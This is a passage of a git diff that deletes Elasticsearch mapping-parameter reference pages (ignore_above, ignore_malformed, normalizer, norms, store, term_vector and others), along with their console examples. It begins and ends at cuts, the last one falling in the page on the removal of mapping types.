formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and time zone offset: `HH:mm:ssZZ`. - -`t_time` or `strict_t_time`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, three digit fraction of second, and time zone - offset prefixed by 'T': `'T'HH:mm:ss.SSSZZ`. - -`t_time_no_millis` or `strict_t_time_no_millis`:: - - A formatter for a two digit hour of day, two digit minute of hour, two - digit second of minute, and time zone offset prefixed by 'T': `'T'HH:mm:ssZZ`. - -`week_date` or `strict_week_date`:: - - A formatter for a full date as four digit weekyear, two digit week of - weekyear, and one digit day of week: `xxxx-'W'ww-e`. - -`week_date_time` or `strict_week_date_time`:: - - A formatter that combines a full weekyear date and time, separated by a - 'T': `xxxx-'W'ww-e'T'HH:mm:ss.SSSZZ`. - -`week_date_time_no_millis` or `strict_week_date_time_no_millis`:: - - A formatter that combines a full weekyear date and time without millis, - separated by a 'T': `xxxx-'W'ww-e'T'HH:mm:ssZZ`. - -`weekyear` or `strict_weekyear`:: - - A formatter for a four digit weekyear: `xxxx`. - -`weekyear_week` or `strict_weekyear_week`:: - - A formatter for a four digit weekyear and two digit week of weekyear: - `xxxx-'W'ww`. - -`weekyear_week_day` or `strict_weekyear_week_day`:: - - A formatter for a four digit weekyear, two digit week of weekyear, and one - digit day of week: `xxxx-'W'ww-e`. - -`year` or `strict_year`:: - - A formatter for a four digit year: `yyyy`. - -`year_month` or `strict_year_month`:: - - A formatter for a four digit year and two digit month of year: `yyyy-MM`. - -`year_month_day` or `strict_year_month_day`:: - - A formatter for a four digit year, two digit month of year, and two digit - day of month: `yyyy-MM-dd`. diff --git a/docs/reference/mapping/params/ignore-above.asciidoc b/docs/reference/mapping/params/ignore-above.asciidoc deleted file mode 100644 index d144e4ef9ea..00000000000 --- a/docs/reference/mapping/params/ignore-above.asciidoc +++ /dev/null @@ -1,59 +0,0 @@ -[[ignore-above]] -=== `ignore_above` - -Strings longer than the `ignore_above` setting will not be indexed or stored. -For arrays of strings, `ignore_above` will be applied for each array element separately and string elements longer than `ignore_above` will not be indexed or stored. - -NOTE: All strings/array elements will still be present in the `_source` field, if the latter is enabled which is the default in Elasticsearch. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "message": { - "type": "keyword", - "ignore_above": 20 <1> - } - } - } -} - -PUT my-index-000001/_doc/1 <2> -{ - "message": "Syntax error" -} - -PUT my-index-000001/_doc/2 <3> -{ - "message": "Syntax error with some long stacktrace" -} - -GET my-index-000001/_search <4> -{ - "aggs": { - "messages": { - "terms": { - "field": "message" - } - } - } -} --------------------------------------------------- - -<1> This field will ignore any string longer than 20 characters. -<2> This document is indexed successfully. -<3> This document will be indexed, but without indexing the `message` field. -<4> Search returns both documents, but only the first is present in the terms aggregation. - -TIP: The `ignore_above` setting can be updated on -existing fields using the <>. - -This option is also useful for protecting against Lucene's term byte-length -limit of `32766`. - -NOTE: The value for `ignore_above` is the _character count_, but Lucene counts -bytes. If you use UTF-8 text with many non-ASCII characters, you may want to -set the limit to `32766 / 4 = 8191` since UTF-8 characters may occupy at most -4 bytes. diff --git a/docs/reference/mapping/params/ignore-malformed.asciidoc b/docs/reference/mapping/params/ignore-malformed.asciidoc deleted file mode 100644 index 69f66a0681c..00000000000 --- a/docs/reference/mapping/params/ignore-malformed.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[ignore-malformed]] -=== `ignore_malformed` - -Sometimes you don't have much control over the data that you receive. One -user may send a `login` field that is a <>, and another sends a -`login` field that is an email address. - -Trying to index the wrong data type into a field throws an exception by -default, and rejects the whole document. The `ignore_malformed` parameter, if -set to `true`, allows the exception to be ignored. The malformed field is not -indexed, but other fields in the document are processed normally. - -For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "number_one": { - "type": "integer", - "ignore_malformed": true - }, - "number_two": { - "type": "integer" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Some text value", - "number_one": "foo" <1> -} - -PUT my-index-000001/_doc/2 -{ - "text": "Some text value", - "number_two": "foo" <2> -} --------------------------------------------------- -// TEST[catch:bad_request] - -<1> This document will have the `text` field indexed, but not the `number_one` field. -<2> This document will be rejected because `number_two` does not allow malformed values. - -The `ignore_malformed` setting is currently supported by the following <>: - -<>:: `long`, `integer`, `short`, `byte`, `double`, `float`, `half_float`, `scaled_float` -<>:: `date` -<>:: `date_nanos` -<>:: `geo_point` for lat/lon points -<>:: `geo_shape` for complex shapes like polygons -<>:: `ip` for IPv4 and IPv6 addresses - -TIP: The `ignore_malformed` setting value can be updated on -existing fields using the <>. - -[[ignore-malformed-setting]] -==== Index-level default - -The `index.mapping.ignore_malformed` setting can be set on the index level to -ignore malformed content globally across all allowed mapping types. -Mapping types that don't support the setting will ignore it if set on the index level. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "index.mapping.ignore_malformed": true <1> - }, - "mappings": { - "properties": { - "number_one": { <1> - "type": "byte" - }, - "number_two": { - "type": "integer", - "ignore_malformed": false <2> - } - } - } -} --------------------------------------------------- - -<1> The `number_one` field inherits the index-level setting. -<2> The `number_two` field overrides the index-level setting to turn off `ignore_malformed`. - -==== Dealing with malformed fields - -Malformed fields are silently ignored at indexing time when `ignore_malformed` -is turned on. Whenever possible it is recommended to keep the number of -documents that have a malformed field contained, or queries on this field will -become meaningless. Elasticsearch makes it easy to check how many documents -have malformed fields by using `exists`,`term` or `terms` queries on the special -<> field. - -[[json-object-limits]] -==== Limits for JSON Objects -You can't use `ignore_malformed` with the following data types: - -* <> -* <> -* <> - -You also can't use `ignore_malformed` to ignore JSON objects submitted to fields -of the wrong data type. A JSON object is any data surrounded by curly brackets -`"{}"` and includes data mapped to the nested, object, and range data types. - -If you submit a JSON object to an unsupported field, {es} will return an error -and reject the entire document regardless of the `ignore_malformed` setting. diff --git a/docs/reference/mapping/params/index-options.asciidoc b/docs/reference/mapping/params/index-options.asciidoc deleted file mode 100644 index 87178e6fc64..00000000000 --- a/docs/reference/mapping/params/index-options.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[[index-options]] -=== `index_options` - -The `index_options` parameter controls what information is added to the -inverted index for search and highlighting purposes. - -[WARNING] -==== -The `index_options` parameter is intended for use with <> fields -only. Avoid using `index_options` with other field data types. -==== - -It accepts the following values: - -`docs`:: -Only the doc number is indexed. Can answer the question _Does this term -exist in this field?_ - -`freqs`:: -Doc number and term frequencies are indexed. Term frequencies are used to -score repeated terms higher than single terms. - -`positions` (default):: -Doc number, term frequencies, and term positions (or order) are indexed. -Positions can be used for -<>. - -`offsets`:: -Doc number, term frequencies, positions, and start and end character -offsets (which map the term back to the original string) are indexed. -Offsets are used by the <> to speed up highlighting. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "text": { - "type": "text", - "index_options": "offsets" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Quick brown fox" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "text": "brown fox" - } - }, - "highlight": { - "fields": { - "text": {} <1> - } - } -} --------------------------------------------------- - -<1> The `text` field will use the postings for the highlighting by default because `offsets` are indexed. diff --git a/docs/reference/mapping/params/index-phrases.asciidoc b/docs/reference/mapping/params/index-phrases.asciidoc deleted file mode 100644 index 1b169a33dcc..00000000000 --- a/docs/reference/mapping/params/index-phrases.asciidoc +++ /dev/null @@ -1,8 +0,0 @@ -[[index-phrases]] -=== `index_phrases` - -If enabled, two-term word combinations ('shingles') are indexed into a separate -field. This allows exact phrase queries (no slop) to run more efficiently, at the expense -of a larger index. Note that this works best when stopwords are not removed, -as phrases containing stopwords will not use the subsidiary field and will fall -back to a standard phrase query. Accepts `true` or `false` (default). \ No newline at end of file diff --git a/docs/reference/mapping/params/index-prefixes.asciidoc b/docs/reference/mapping/params/index-prefixes.asciidoc deleted file mode 100644 index 1184245ca15..00000000000 --- a/docs/reference/mapping/params/index-prefixes.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[index-prefixes]] -=== `index_prefixes` - -The `index_prefixes` parameter enables the indexing of term prefixes to speed -up prefix searches. It accepts the following optional settings: - -[horizontal] -`min_chars`:: - - The minimum prefix length to index. Must be greater than 0, and defaults - to 2. The value is inclusive. - -`max_chars`:: - - The maximum prefix length to index. Must be less than 20, and defaults to 5. - The value is inclusive. - -This example creates a text field using the default prefix length settings: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "body_text": { - "type": "text", - "index_prefixes": { } <1> - } - } - } -} --------------------------------- - -<1> An empty settings object will use the default `min_chars` and `max_chars` -settings - -This example uses custom prefix length settings: - -[source,console] --------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_name": { - "type": "text", - "index_prefixes": { - "min_chars" : 1, - "max_chars" : 10 - } - } - } - } -} --------------------------------- diff --git a/docs/reference/mapping/params/index.asciidoc b/docs/reference/mapping/params/index.asciidoc deleted file mode 100644 index 32916e98d35..00000000000 --- a/docs/reference/mapping/params/index.asciidoc +++ /dev/null @@ -1,6 +0,0 @@ -[[mapping-index]] -=== `index` - -The `index` option controls whether field values are indexed. It accepts `true` -or `false` and defaults to `true`. Fields that are not indexed are not queryable. - diff --git a/docs/reference/mapping/params/meta.asciidoc b/docs/reference/mapping/params/meta.asciidoc deleted file mode 100644 index d97c9c1a214..00000000000 --- a/docs/reference/mapping/params/meta.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[mapping-field-meta]] -=== `meta` - -Metadata attached to the field. This metadata is opaque to Elasticsearch, it is -only useful for multiple applications that work on the same indices to share -meta information about fields such as units - -[source,console] ------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "latency": { - "type": "long", - "meta": { - "unit": "ms" - } - } - } - } -} ------------- -// TEST - -NOTE: Field metadata enforces at most 5 entries, that keys have a length that -is less than or equal to 20, and that values are strings whose length is less -than or equal to 50. - -NOTE: Field metadata is updatable by submitting a mapping update. The metadata -of the update will override the metadata of the existing field. diff --git a/docs/reference/mapping/params/multi-fields.asciidoc b/docs/reference/mapping/params/multi-fields.asciidoc deleted file mode 100644 index fcf828db890..00000000000 --- a/docs/reference/mapping/params/multi-fields.asciidoc +++ /dev/null @@ -1,128 +0,0 @@ -[[multi-fields]] -=== `fields` - -It is often useful to index the same field in different ways for different -purposes. This is the purpose of _multi-fields_. For instance, a `string` -field could be mapped as a `text` field for full-text -search, and as a `keyword` field for sorting or aggregations: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "city": { - "type": "text", - "fields": { - "raw": { <1> - "type": "keyword" - } - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "city": "New York" -} - -PUT my-index-000001/_doc/2 -{ - "city": "York" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "city": "york" <2> - } - }, - "sort": { - "city.raw": "asc" <3> - }, - "aggs": { - "Cities": { - "terms": { - "field": "city.raw" <3> - } - } - } -} --------------------------------------------------- - -<1> The `city.raw` field is a `keyword` version of the `city` field. -<2> The `city` field can be used for full text search. -<3> The `city.raw` field can be used for sorting and aggregations - -NOTE: Multi-fields do not change the original `_source` field. - -TIP: New multi-fields can be added to existing -fields using the <>. - -==== Multi-fields with multiple analyzers - -Another use case of multi-fields is to analyze the same field in different -ways for better relevance. For instance we could index a field with the -<> which breaks text up into -words, and again with the <> -which stems words into their root form: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "text": { <1> - "type": "text", - "fields": { - "english": { <2> - "type": "text", - "analyzer": "english" - } - } - } - } - } -} - -PUT my-index-000001/_doc/1 -{ "text": "quick brown fox" } <3> - -PUT my-index-000001/_doc/2 -{ "text": "quick brown foxes" } <3> - -GET my-index-000001/_search -{ - "query": { - "multi_match": { - "query": "quick brown foxes", - "fields": [ <4> - "text", - "text.english" - ], - "type": "most_fields" <4> - } - } -} --------------------------------------------------- - -<1> The `text` field uses the `standard` analyzer. -<2> The `text.english` field uses the `english` analyzer. -<3> Index two documents, one with `fox` and the other with `foxes`. -<4> Query both the `text` and `text.english` fields and combine the scores. - -The `text` field contains the term `fox` in the first document and `foxes` in -the second document. The `text.english` field contains `fox` for both -documents, because `foxes` is stemmed to `fox`. - -The query string is also analyzed by the `standard` analyzer for the `text` -field, and by the `english` analyzer for the `text.english` field. The -stemmed field allows a query for `foxes` to also match the document containing -just `fox`. This allows us to match as many documents as possible. By also -querying the unstemmed `text` field, we improve the relevance score of the -document which matches `foxes` exactly. diff --git a/docs/reference/mapping/params/normalizer.asciidoc b/docs/reference/mapping/params/normalizer.asciidoc deleted file mode 100644 index 3eb340cc745..00000000000 --- a/docs/reference/mapping/params/normalizer.asciidoc +++ /dev/null @@ -1,181 +0,0 @@ -[[normalizer]] -=== `normalizer` - -The `normalizer` property of <> fields is similar to -<> except that it guarantees that the analysis chain -produces a single token. - -The `normalizer` is applied prior to indexing the keyword, as well as at -search-time when the `keyword` field is searched via a query parser such as -the <> query or via a term-level query -such as the <> query. - -A simple normalizer called `lowercase` ships with elasticsearch and can be used. -Custom normalizers can be defined as part of analysis settings as follows. - - -[source,console] --------------------------------- -PUT index -{ - "settings": { - "analysis": { - "normalizer": { - "my_normalizer": { - "type": "custom", - "char_filter": [], - "filter": ["lowercase", "asciifolding"] - } - } - } - }, - "mappings": { - "properties": { - "foo": { - "type": "keyword", - "normalizer": "my_normalizer" - } - } - } -} - -PUT index/_doc/1 -{ - "foo": "BÀR" -} - -PUT index/_doc/2 -{ - "foo": "bar" -} - -PUT index/_doc/3 -{ - "foo": "baz" -} - -POST index/_refresh - -GET index/_search -{ - "query": { - "term": { - "foo": "BAR" - } - } -} - -GET index/_search -{ - "query": { - "match": { - "foo": "BAR" - } - } -} --------------------------------- - -The above queries match documents 1 and 2 since `BÀR` is converted to `bar` at -both index and query time. - -[source,console-result] ----------------------------- -{ - "took": $body.took, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 2, - "relation": "eq" - }, - "max_score": 0.4700036, - "hits": [ - { - "_index": "index", - "_type": "_doc", - "_id": "1", - "_score": 0.4700036, - "_source": { - "foo": "BÀR" - } - }, - { - "_index": "index", - "_type": "_doc", - "_id": "2", - "_score": 0.4700036, - "_source": { - "foo": "bar" - } - } - ] - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] - -Also, the fact that keywords are converted prior to indexing also means that -aggregations return normalized values: - -[source,console] ----------------------------- -GET index/_search -{ - "size": 0, - "aggs": { - "foo_terms": { - "terms": { - "field": "foo" - } - } - } -} ----------------------------- -// TEST[continued] - -returns - -[source,console-result] ----------------------------- -{ - "took": 43, - "timed_out": false, - "_shards": { - "total": 1, - "successful": 1, - "skipped" : 0, - "failed": 0 - }, - "hits": { - "total" : { - "value": 3, - "relation": "eq" - }, - "max_score": null, - "hits": [] - }, - "aggregations": { - "foo_terms": { - "doc_count_error_upper_bound": 0, - "sum_other_doc_count": 0, - "buckets": [ - { - "key": "bar", - "doc_count": 2 - }, - { - "key": "baz", - "doc_count": 1 - } - ] - } - } -} ----------------------------- -// TESTRESPONSE[s/"took".*/"took": "$body.took",/] diff --git a/docs/reference/mapping/params/norms.asciidoc b/docs/reference/mapping/params/norms.asciidoc deleted file mode 100644 index 303c2af5ecc..00000000000 --- a/docs/reference/mapping/params/norms.asciidoc +++ /dev/null @@ -1,38 +0,0 @@ -[[norms]] -=== `norms` - -Norms store various normalization factors that are later used at query time -in order to compute the score of a document relatively to a query. - -Although useful for scoring, norms also require quite a lot of disk -(typically in the order of one byte per document per field in your index, even -for documents that don't have this specific field). As a consequence, if you -don't need scoring on a specific field, you should disable norms on that -field. In particular, this is the case for fields that are used solely for -filtering or aggregations. - -TIP: Norms can be disabled on existing fields using -the <>. - -Norms can be disabled (but not reenabled after the fact), using the -<> like so: - -[source,console] ------------- -PUT my-index-000001/_mapping -{ - "properties": { - "title": { - "type": "text", - "norms": false - } - } -} ------------- -// TEST[s/^/PUT my-index-000001\n/] - -NOTE: Norms will not be removed instantly, but will be removed as old segments -are merged into new segments as you continue indexing new documents. Any score -computation on a field that has had norms removed might return inconsistent -results since some documents won't have norms anymore while other documents -might still have norms. diff --git a/docs/reference/mapping/params/null-value.asciidoc b/docs/reference/mapping/params/null-value.asciidoc deleted file mode 100644 index f1737ed5ace..00000000000 --- a/docs/reference/mapping/params/null-value.asciidoc +++ /dev/null @@ -1,53 +0,0 @@ -[[null-value]] -=== `null_value` - -A `null` value cannot be indexed or searched. When a field is set to `null`, -(or an empty array or an array of `null` values) it is treated as though that -field has no values. - -The `null_value` parameter allows you to replace explicit `null` values with -the specified value so that it can be indexed and searched. For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "status_code": { - "type": "keyword", - "null_value": "NULL" <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "status_code": null -} - -PUT my-index-000001/_doc/2 -{ - "status_code": [] <2> -} - -GET my-index-000001/_search -{ - "query": { - "term": { - "status_code": "NULL" <3> - } - } -} --------------------------------------------------- - -<1> Replace explicit `null` values with the term `NULL`. -<2> An empty array does not contain an explicit `null`, and so won't be replaced with the `null_value`. -<3> A query for `NULL` returns document 1, but not document 2. - -IMPORTANT: The `null_value` needs to be the same data type as the field. For -instance, a `long` field cannot have a string `null_value`. - -NOTE: The `null_value` only influences how data is indexed, it doesn't modify -the `_source` document. diff --git a/docs/reference/mapping/params/position-increment-gap.asciidoc b/docs/reference/mapping/params/position-increment-gap.asciidoc deleted file mode 100644 index 39b7b87cb3b..00000000000 --- a/docs/reference/mapping/params/position-increment-gap.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[position-increment-gap]] -=== `position_increment_gap` - -<> text fields take term <> -into account, in order to be able to support -<>. -When indexing text fields with multiple values a "fake" gap is added between -the values to prevent most phrase queries from matching across the values. The -size of this gap is configured using `position_increment_gap` and defaults to -`100`. - -For example: - -[source,console] --------------------------------------------------- -PUT my-index-000001/_doc/1 -{ - "names": [ "John Abraham", "Lincoln Smith"] -} - -GET my-index-000001/_search -{ - "query": { - "match_phrase": { - "names": { - "query": "Abraham Lincoln" <1> - } - } - } -} - -GET my-index-000001/_search -{ - "query": { - "match_phrase": { - "names": { - "query": "Abraham Lincoln", - "slop": 101 <2> - } - } - } -} --------------------------------------------------- - -<1> This phrase query doesn't match our document which is totally expected. -<2> This phrase query matches our document, even though `Abraham` and `Lincoln` - are in separate strings, because `slop` > `position_increment_gap`. - - -The `position_increment_gap` can be specified in the mapping. For instance: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "names": { - "type": "text", - "position_increment_gap": 0 <1> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "names": [ "John Abraham", "Lincoln Smith"] -} - -GET my-index-000001/_search -{ - "query": { - "match_phrase": { - "names": "Abraham Lincoln" <2> - } - } -} --------------------------------------------------- - -<1> The first term in the next array element will be 0 terms apart from the - last term in the previous array element. -<2> The phrase query matches our document which is weird, but its what we asked - for in the mapping. - diff --git a/docs/reference/mapping/params/properties.asciidoc b/docs/reference/mapping/params/properties.asciidoc deleted file mode 100644 index 1f3330062c2..00000000000 --- a/docs/reference/mapping/params/properties.asciidoc +++ /dev/null @@ -1,101 +0,0 @@ -[[properties]] -=== `properties` - -Type mappings, <> and <> -contain sub-fields, called `properties`. These properties may be of any -<>, including `object` and `nested`. Properties can -be added: - -* explicitly by defining them when <>. -* explicitly by defining them when adding or updating a mapping type with the <> API. -* <> just by indexing documents containing new fields. - -Below is an example of adding `properties` to a mapping type, an `object` -field, and a `nested` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { <1> - "manager": { - "properties": { <2> - "age": { "type": "integer" }, - "name": { "type": "text" } - } - }, - "employees": { - "type": "nested", - "properties": { <3> - "age": { "type": "integer" }, - "name": { "type": "text" } - } - } - } - } -} - -PUT my-index-000001/_doc/1 <4> -{ - "region": "US", - "manager": { - "name": "Alice White", - "age": 30 - }, - "employees": [ - { - "name": "John Smith", - "age": 34 - }, - { - "name": "Peter Brown", - "age": 26 - } - ] -} --------------------------------------------------- - -<1> Properties in the top-level mappings definition. -<2> Properties under the `manager` object field. -<3> Properties under the `employees` nested field. -<4> An example document which corresponds to the above mapping. - -TIP: The `properties` setting is allowed to have different settings for fields -of the same name in the same index. New properties can be added to existing -fields using the <>. - -==== Dot notation - -Inner fields can be referred to in queries, aggregations, etc., using _dot -notation_: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match": { - "manager.name": "Alice White" - } - }, - "aggs": { - "Employees": { - "nested": { - "path": "employees" - }, - "aggs": { - "Employee Ages": { - "histogram": { - "field": "employees.age", - "interval": 5 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -IMPORTANT: The full path to the inner field must be specified. diff --git a/docs/reference/mapping/params/search-analyzer.asciidoc b/docs/reference/mapping/params/search-analyzer.asciidoc deleted file mode 100644 index 9f63b0b5acf..00000000000 --- a/docs/reference/mapping/params/search-analyzer.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[search-analyzer]] -=== `search_analyzer` - -Usually, the same <> should be applied at index time and at -search time, to ensure that the terms in the query are in the same format as -the terms in the inverted index. - -Sometimes, though, it can make sense to use a different analyzer at search -time, such as when using the <> -tokenizer for autocomplete. - -By default, queries will use the `analyzer` defined in the field mapping, but -this can be overridden with the `search_analyzer` setting: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "filter": { - "autocomplete_filter": { - "type": "edge_ngram", - "min_gram": 1, - "max_gram": 20 - } - }, - "analyzer": { - "autocomplete": { <1> - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "autocomplete_filter" - ] - } - } - } - }, - "mappings": { - "properties": { - "text": { - "type": "text", - "analyzer": "autocomplete", <2> - "search_analyzer": "standard" <2> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Quick Brown Fox" <3> -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "text": { - "query": "Quick Br", <4> - "operator": "and" - } - } - } -} - --------------------------------------------------- - -<1> Analysis settings to define the custom `autocomplete` analyzer. -<2> The `text` field uses the `autocomplete` analyzer at index time, but the `standard` analyzer at search time. -<3> This field is indexed as the terms: [ `q`, `qu`, `qui`, `quic`, `quick`, `b`, `br`, `bro`, `brow`, `brown`, `f`, `fo`, `fox` ] -<4> The query searches for both of these terms: [ `quick`, `br` ] - -See {defguide}/_index_time_search_as_you_type.html[Index time search-as-you- -type] for a full explanation of this example. - -TIP: The `search_analyzer` setting can be updated on existing fields -using the <>. diff --git a/docs/reference/mapping/params/similarity.asciidoc b/docs/reference/mapping/params/similarity.asciidoc deleted file mode 100644 index 0ac6455c961..00000000000 --- a/docs/reference/mapping/params/similarity.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[similarity]] -=== `similarity` - -Elasticsearch allows you to configure a scoring algorithm or _similarity_ per -field. The `similarity` setting provides a simple way of choosing a similarity -algorithm other than the default `BM25`, such as `TF/IDF`. - -Similarities are mostly useful for <> fields, but can also apply -to other field types. - -Custom similarities can be configured by tuning the parameters of the built-in -similarities. For more details about this expert options, see the -<>. - -The only similarities which can be used out of the box, without any further -configuration are: - -`BM25`:: -The {wikipedia}/Okapi_BM25[Okapi BM25 algorithm]. The -algorithm used by default in {es} and Lucene. - -`classic`:: -deprecated:[7.0.0] -The https://en.wikipedia.org/wiki/Tf%E2%80%93idf[TF/IDF algorithm], the former -default in {es} and Lucene. - -`boolean`:: - A simple boolean similarity, which is used when full-text ranking is not needed - and the score should only be based on whether the query terms match or not. - Boolean similarity gives terms a score equal to their query boost. - - -The `similarity` can be set on the field level when a field is first created, -as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "default_field": { <1> - "type": "text" - }, - "boolean_sim_field": { - "type": "text", - "similarity": "boolean" <2> - } - } - } -} --------------------------------------------------- - -<1> The `default_field` uses the `BM25` similarity. -<2> The `boolean_sim_field` uses the `boolean` similarity. diff --git a/docs/reference/mapping/params/store.asciidoc b/docs/reference/mapping/params/store.asciidoc deleted file mode 100644 index 78dfad815e7..00000000000 --- a/docs/reference/mapping/params/store.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[mapping-store]] -=== `store` - -By default, field values are <> to make them searchable, -but they are not _stored_. This means that the field can be queried, but the -original field value cannot be retrieved. - -Usually this doesn't matter. The field value is already part of the -<>, which is stored by default. If you -only want to retrieve the value of a single field or of a few fields, instead -of the whole `_source`, then this can be achieved with -<>. - -In certain situations it can make sense to `store` a field. For instance, if -you have a document with a `title`, a `date`, and a very large `content` -field, you may want to retrieve just the `title` and the `date` without having -to extract those fields from a large `_source` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "store": true <1> - }, - "date": { - "type": "date", - "store": true <1> - }, - "content": { - "type": "text" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "title": "Some short title", - "date": "2015-01-01", - "content": "A very long content field..." -} - -GET my-index-000001/_search -{ - "stored_fields": [ "title", "date" ] <2> -} --------------------------------------------------- - -<1> The `title` and `date` fields are stored. -<2> This request will retrieve the values of the `title` and `date` fields. - -[NOTE] -.Stored fields returned as arrays -====================================== - -For consistency, stored fields are always returned as an _array_ because there -is no way of knowing if the original field value was a single value, multiple -values, or an empty array. - -If you need the original value, you should retrieve it from the `_source` -field instead. - -====================================== - -Another situation where it can make sense to make a field stored is for those -that don't appear in the `_source` field (such as <>). diff --git a/docs/reference/mapping/params/term-vector.asciidoc b/docs/reference/mapping/params/term-vector.asciidoc deleted file mode 100644 index b5d83a97ab9..00000000000 --- a/docs/reference/mapping/params/term-vector.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[term-vector]] -=== `term_vector` - -Term vectors contain information about the terms produced by the -<> process, including: - -* a list of terms. -* the position (or order) of each term. -* the start and end character offsets mapping the term to its - origin in the original string. -* payloads (if they are available) — user-defined binary data - associated with each term position. - -These term vectors can be stored so that they can be retrieved for a -particular document. - -The `term_vector` setting accepts: - -[horizontal] -`no`:: No term vectors are stored. (default) -`yes`:: Just the terms in the field are stored. -`with_positions`:: Terms and positions are stored. -`with_offsets`:: Terms and character offsets are stored. -`with_positions_offsets`:: Terms, positions, and character offsets are stored. -`with_positions_payloads`:: Terms, positions, and payloads are stored. -`with_positions_offsets_payloads`:: Terms, positions, offsets and payloads are stored. - -The fast vector highlighter requires `with_positions_offsets`. -<> can retrieve whatever is stored. - -WARNING: Setting `with_positions_offsets` will double the size of a field's -index. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "text": { - "type": "text", - "term_vector": "with_positions_offsets" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Quick brown fox" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "text": "brown fox" - } - }, - "highlight": { - "fields": { - "text": {} <1> - } - } -} --------------------------------------------------- - -<1> The fast vector highlighter will be used by default for the `text` field - because term vectors are enabled. - diff --git a/docs/reference/mapping/removal_of_types.asciidoc b/docs/reference/mapping/removal_of_types.asciidoc deleted file mode 100644 index f0550d3f93a..00000000000 --- a/docs/reference/mapping/removal_of_types.asciidoc +++ /dev/null @@ -1,732 +0,0 @@ -[[removal-of-types]] -== Removal of mapping types - -IMPORTANT: Indices created in Elasticsearch 7.0.0 or later no longer accept a -`_default_` mapping. Indices created in 6.x will continue to function as before -in Elasticsearch 6.x. Types are deprecated in APIs in 7.0, with breaking changes -to the index creation, put mapping, get mapping, put template, get template and -get field mappings APIs. - -[discrete] -=== What are mapping types? - -Since the first release of Elasticsearch, each document has been stored in a -single index and assigned a single mapping type. A mapping type was used to -represent the type of document or entity being indexed, for instance a -`twitter` index might have a `user` type and a `tweet` type. - -Each mapping type could have its own fields, so the `user` type might have a -`full_name` field, a `user_name` field, and an `email` field, while the -`tweet` type could have a `content` field, a `tweeted_at` field and, like the -`user` type, a `user_name` field. - -Each document had a `_type` metadata field containing the type name, and searches -could be limited to one or more types by specifying the type name(s) in the -URL: - -[source,js] ----- -GET twitter/user,tweet/_search -{ - "query": { - "match": { - "user_name": "kimchy" - } - } -} ----- -// NOTCONSOLE - -The `_type` field was combined with the document's `_id` to generate a `_uid` -field, so documents of different types with the same `_id` could exist in a -single index. - -Mapping types were also used to establish a -<> -between documents, so documents of type `question` could be parents to -documents of type `answer`. - -[discrete] -=== Why are mapping types being removed? - -Initially, we spoke about an ``index'' being similar to a ``database'' in an -SQL database, and a ``type'' being equivalent to a -``table''. - -This was a bad analogy that led to incorrect assumptions. In an SQL database, -tables are independent of each other. The columns in one table have no -bearing on columns with the same name in another table. This is not the case -for fields in a mapping type. - -In an Elasticsearch index, fields that have the same name in different mapping -types are backed by the same Lucene field internally. In other words, using -the example above, the `user_name` field in the `user` type is stored in -exactly the same field as the `user_name` field in the `tweet` type, and both -`user_name` fields must have the same mapping (definition) in both types. - -This can lead to frustration when, for example, you want `deleted` to be a -`date` field in one type and a `boolean` field in another type in the same -index. - -On top of that, storing different entities that have few or no fields in -common in the same index leads to sparse data and interferes with Lucene's -ability to compress documents efficiently. - -For these reasons, we have decided to remove the concept of mapping types from -Elasticsearch. - -[discrete] -=== Alternatives to mapping types - -[discrete] -==== Index per document type - -The first alternative is to have an index per document type. Instead of -storing tweets and users in a single `twitter` index, you could store tweets -in the `tweets` index and users in the `user` index. Indices are completely -independent of each other and so there will be no conflict of field types -between indices. - -This approach has two 